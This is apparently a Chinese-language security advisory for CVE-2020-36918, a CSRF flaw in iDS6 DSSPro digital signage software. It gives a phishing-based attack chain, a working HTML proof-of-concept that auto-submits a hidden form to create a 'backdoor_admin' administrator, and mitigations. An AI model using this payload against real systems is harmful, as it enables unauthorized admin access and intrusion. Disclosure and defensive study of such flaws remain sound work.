IPBUF安全漏洞报告
English
CVE-2020-36918 CVSS 4.3 中危

CVE-2020-36918 iDS6 DSSPro数字标牌系统跨站请求伪造漏洞

披露日期: 2026-01-06

漏洞信息

漏洞编号
CVE-2020-36918
漏洞类型
跨站请求伪造(CSRF)
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
iDS6 DSSPro Digital Signage System 6.2

相关标签

CVE-2020-36918跨站请求伪造CSRFiDS6 DSSPro数字标牌系统权限提升身份验证绕过MEDIUM中危漏洞

漏洞概述

CVE-2020-36918是iDS6 DSSPro数字标牌系统6.2版本中存在的一个跨站请求伪造(CSRF)安全漏洞。该漏洞的CVSS评分为4.3,属于中等严重程度。iDS6 DSSPro是一款广泛应用于商业场景的数字标牌管理系统,用于内容发布和屏幕管理。漏洞源于系统缺乏对关键管理操作的CSRF令牌验证机制。攻击者可以利用此漏洞诱导已登录的管理员用户在不知情的情况下执行未授权的操作,例如添加新用户账户、修改系统配置或提升权限等。由于数字标牌系统通常部署在企业内部网络中,攻击成功可能导致内网横向移动或敏感信息泄露。攻击者只需精心构造一个恶意网页或链接,当管理员访问时,浏览器会自动向目标系统发送携带有效会话Cookie的请求,从而绕过认证机制完成攻击。该漏洞影响系统的安全管理功能,强烈建议管理员尽快采取修复措施。

技术细节

iDS6 DSSPro Digital Signage System 6.2在处理用户管理功能时存在CSRF漏洞。系统管理员添加用户的请求缺少CSRF token验证,导致攻击者可以伪造请求。当管理员登录系统后访问攻击者控制的恶意页面时,浏览器会自动携带有效会话Cookie发送请求。攻击者构造的HTML表单包含添加用户的必要参数(如username、password、role等),通过自动提交机制触发请求。服务器端仅验证会话Cookie的有效性,未验证请求来源的合法性,导致攻击成功。漏洞影响/user/add或/admin/user management等管理接口。攻击者可以利用此漏洞创建管理员账户获得持久化访问权限,或修改系统配置。漏洞利用条件:1)管理员已登录系统;2)管理员访问恶意页面;3)会话Cookie未过期。建议在所有状态变更请求中实施CSRF token验证,并验证Referer和Origin头部。

攻击链分析

STEP 1
步骤1: 侦察阶段
攻击者识别目标组织使用的iDS6 DSSPro系统版本,通过搜索引擎或Shodan等工具发现暴露的管理接口
STEP 2
步骤2: 社会工程准备
攻击者制作包含恶意HTML表单的网页,内容伪装成正常的系统更新或Dashboard页面,减少管理员怀疑
STEP 3
步骤3: 诱导访问
攻击者通过钓鱼邮件、即时消息或水坑攻击等方式诱导已登录的管理员访问恶意页面
STEP 4
步骤4: CSRF请求触发
恶意页面中的JavaScript自动提交表单,浏览器携带有效会话Cookie向目标系统发送添加用户的POST请求
STEP 5
步骤5: 攻击成功
服务器验证会话Cookie后执行请求,在系统中创建具有管理员权限的后门账户
STEP 6
步骤6: 持久化控制
攻击者使用创建的账户登录系统,进行进一步的数据窃取、横向移动或破坏操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CSRF PoC for CVE-2020-36918: Add unauthorized admin user --> <!DOCTYPE html> <html> <head> <title>Dashboard Update</title> </head> <body> <h1>System Dashboard - Loading...</h1> <!-- Hidden form to add new admin user --> <form action="https://target-ids6-system.com/api/user/add" method="POST" id="csrfForm" style="display:none;"> <input type="hidden" name="username" value="backdoor_admin"> <input type="hidden" name="password" value="P@ssw0rd123!"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="role" value="administrator"> <input type="hidden" name="department" value="IT"> <input type="hidden" name="action" value="create_user"> </form> <script> // Auto-submit the form when page loads document.addEventListener('DOMContentLoaded', function() { console.log('Updating dashboard configuration...'); // Submit the CSRF request document.getElementById('csrfForm').submit(); }); // Optional: Redirect after exploit setTimeout(function() { window.location.href = 'https://target-ids6-system.com/dashboard'; }, 2000); </script> <p>If not redirected, <a href="javascript:document.getElementById('csrfForm').submit()">click here</a></p> </body> </html>

影响范围

iDS6 DSSPro Digital Signage System 6.2及之前版本

防御指南

临时缓解措施
在等待官方补丁期间,可采取以下临时缓解措施:1)启用Web应用防火墙规则拦截异常请求;2)对管理接口实施IP白名单访问控制;3)使用浏览器安全插件阻止跨站请求;4)管理员操作完成后及时退出登录并清除Cookie;5)加强对管理员的安全意识培训,提高对钓鱼攻击的警惕性;6)监控网络流量和系统日志,关注异常的账户创建行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表